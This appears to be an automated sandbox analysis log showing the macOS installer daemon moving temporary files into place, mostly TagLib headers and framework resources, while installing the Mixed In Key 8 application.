Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_T7eFcw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/s3mfile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_0TGzIS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/s3mproperties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_y7fkag -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mp4properties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_2akWwI -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mpegfile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_zNZgBS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/asfproperties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_4pUbaz -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/itproperties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_yR2VmY -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/ownershipframe.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_1YpdZl -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tmap.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_YLkrs1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/taglib.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_K4K3Y3 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v1genres.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_S7B093 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mpcfile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_unwL7C -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/trefcounter.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_eje0YG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tlist.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_BqpRJa -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/uniquefileidentifierframe.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_D2Ebgr -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/flacproperties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_lnR1Sf -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/trueaudioproperties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_2XElWX -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tdebuglistener.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_70W1i4 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/aifffile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_m3vaBA -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/opusfile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_4QS7oY -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tiostream.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_rXLLjv -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mp4atom.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_k6coK9 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/apetag.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_Km9RwW -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/modtag.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_P6SAGZ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/asffile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_LId2G3 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/textidentificationframe.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_BorFRN -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/asfattribute.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_IXkFDW -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/oggpageheader.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_X6YA5M -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mpcproperties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_JmSGeK -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/flacfile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_zUlkBh -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/modfilebase.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_mgMO2q -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/urllinkframe.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_YAVI4W -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v2tag.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Modules/.BC.T_0LBiwW -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Modules/module.modulemap	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_DLZkCD -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftFoundation.dylib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/_CodeSignature/.BC.T_G0mN3z -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/_CodeSignature/CodeResources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/.BC.T_JU6hLr -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/DanceabilityAudioEngine	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/Resources/en.lproj/.BC.T_w7YJYB -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/Resources/en.lproj/InfoPlist.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/Resources/.BC.T_itp2cS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/Resources/Info.plist	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/_CodeSignature/.BC.T_0GMP3c -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/_CodeSignature/CodeResources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/Resources/.BC.T_HLHxot -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/Resources/Info.plist	Jump to behavior
